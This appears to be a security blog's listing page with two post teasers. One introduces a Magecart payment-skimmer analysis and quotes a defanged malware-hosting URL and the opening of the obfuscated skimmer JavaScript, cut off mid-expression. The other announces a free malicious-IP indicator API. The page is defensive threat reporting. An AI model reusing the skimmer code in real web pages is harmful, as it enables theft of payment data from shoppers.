Magecart Skimmer Analysis: From One Tweet to a Campaign

Starting Point It all began with a tweet: sdcyberresearch on X This tweet hinted at a Magecart-style campaign involving malicious JavaScript injection to skim payment data. Initial Sample The script was hosted at: https://www.cc-analytics[.]com/app.js The original code was heavily obfuscated: (function() { function _0x1B3A1(_0x1B563, _0x1B3FB, _0x1B455, _0x1B509, _0x1B4AF, _0x1B5BD) { _0x1B4AF = function(_0x1B3A1) { return (_0x1B3A1 < _0x1B3FB ? '' : _0x1B4AF(parseInt(_0x1B3A1 / _0x1B3FB))) + ((_0x1B3A1 = _0x1B3A1 % _0x1B3FB) > 35 ?
Read more →

Announcing API for Cloud Intel Atomic Indicators

We are excited to announce the launch of our new API for Cloud Intel Atomic Indicators, a tool designed to provide essential data on malicious IP addresses. This API is a step forward in our commitment to enhancing cybersecurity and is available free of charge. Behind the Scenes: Cloudflare Infrastructure Our API leverages the robust Cloudflare infrastructure, utilizing Cloudflare Workers for efficient handling of API requests, Cloudflare KV Store for secure key management, and Cloudflare R2 for reliable data storage.
Read more →